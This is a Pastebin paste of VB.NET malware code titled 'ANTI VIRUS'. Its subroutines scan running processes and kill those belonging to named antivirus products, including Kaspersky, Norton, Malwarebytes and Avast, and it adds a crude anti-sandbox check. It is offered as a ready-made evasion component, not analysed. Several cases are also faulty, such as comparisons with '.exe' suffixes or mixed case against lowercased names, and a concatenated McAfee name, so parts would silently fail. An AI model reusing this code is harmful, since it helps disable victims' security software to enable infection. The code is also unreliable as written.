Advertisement
Guest User

ANTI VIRUS

a guest
Jan 28th, 2016
1,560
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VB.NET 3.66 KB | None | 0 0
  1.   Antiasquared()
  2.         AntiAvast()
  3.         AntiAVG()
  4.         AntiBitDefender()
  5.         AntiKaspersky()
  6.         AntiMalwarebytes()
  7.         AntiMcAfee()
  8.         AntiNOD32()
  9.         AntiNorton()
  10.         Antisandboxie()
  11.  
  12. =========================================
  13.  
  14.  
  15.     Sub Antiasquared()
  16.         Dim ktp As Process() = Process.GetProcesses
  17.         Dim i As Integer
  18.         For i = 0 To ktp.Length - 1
  19.             Select Case Strings.LCase(ktp(i).ProcessName)
  20.                 Case "a2servic.exe"
  21.                     ktp(i).Kill()
  22.                 Case Else
  23.             End Select
  24.         Next
  25.     End Sub
  26.  
  27.     Sub AntiAvast()
  28.         Dim ktp As Process() = Process.GetProcesses
  29.         Dim i As Integer
  30.         For i = 0 To ktp.Length - 1
  31.             Select Case Strings.LCase(ktp(i).ProcessName)
  32.                 Case "ashWebSv.exe"
  33.                     ktp(i).Kill()
  34.                 Case Else
  35.             End Select
  36.         Next
  37.     End Sub
  38.     Sub AntiAVG()
  39.         Dim ktp As Process() = Process.GetProcesses
  40.         Dim i As Integer
  41.         For i = 0 To ktp.Length - 1
  42.             Select Case Strings.LCase(ktp(i).ProcessName)
  43.                 Case "avgemc.exe"
  44.                     ktp(i).Kill()
  45.                 Case Else
  46.             End Select
  47.         Next
  48.     End Sub
  49.     Sub AntiBitDefender()
  50.         Dim KillTheProcess As Process() = Process.GetProcesses
  51.         Dim i As Integer
  52.         For i = 0 To KillTheProcess.Length - 1
  53.             Select Case Strings.LCase(KillTheProcess(i).ProcessName)
  54.                 Case "bdagent"
  55.                     KillTheProcess(i).Kill()
  56.                 Case Else
  57.             End Select
  58.         Next
  59.     End Sub
  60.  
  61.  
  62.  
  63.     Sub AntiKaspersky()
  64.         Dim KillTheProcess As Process() = Process.GetProcesses
  65.         Dim i As Integer
  66.         For i = 0 To KillTheProcess.Length - 1
  67.             Select Case Strings.LCase(KillTheProcess(i).ProcessName)
  68.                 Case "avp"
  69.                     KillTheProcess(i).Kill()
  70.                 Case Else
  71.             End Select
  72.         Next
  73.     End Sub
  74.  
  75.     Sub AntiMalwarebytes()
  76.         Dim KillTheProcess As Process() = Process.GetProcesses
  77.         Dim i As Integer
  78.         For i = 0 To KillTheProcess.Length - 1
  79.             Select Case Strings.LCase(KillTheProcess(i).ProcessName)
  80.                 Case "mbam"
  81.                     KillTheProcess(i).Kill()
  82.                 Case Else
  83.             End Select
  84.         Next
  85.     End Sub
  86.     Sub AntiMcAfee()
  87.         Dim ktp As Process() = Process.GetProcesses
  88.         Dim i As Integer
  89.         For i = 0 To ktp.Length - 1
  90.             Select Case Strings.LCase(ktp(i).ProcessName)
  91.                 Case "mcagent" & "mcuimgr"
  92.                     ktp(i).Kill()
  93.                 Case Else
  94.             End Select
  95.         Next
  96.     End Sub
  97.     Sub AntiNOD32()
  98.         Dim KillTheProcess As Process() = Process.GetProcesses
  99.         Dim i As Integer
  100.         For i = 0 To KillTheProcess.Length - 1
  101.             Select Case Strings.LCase(KillTheProcess(i).ProcessName)
  102.                 Case "egui"
  103.                     KillTheProcess(i).Kill()
  104.                 Case Else
  105.             End Select
  106.         Next
  107.     End Sub
  108.     Sub AntiNorton()
  109.         Dim ktp As Process() = Process.GetProcesses
  110.         Dim i As Integer
  111.         For i = 0 To ktp.Length - 1
  112.             Select Case Strings.LCase(ktp(i).ProcessName)
  113.                 Case "ccapp.exe"
  114.                     ktp(i).Kill()
  115.                 Case Else
  116.             End Select
  117.         Next
  118.     End Sub
  119.     Sub Antisandboxie()
  120.         On Error Resume Next
  121.         If Me.Text.Contains("#") Then
  122.             Me.Close()
  123.         Else
  124.             Me.Show()
  125.         End If
  126.     End Sub
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement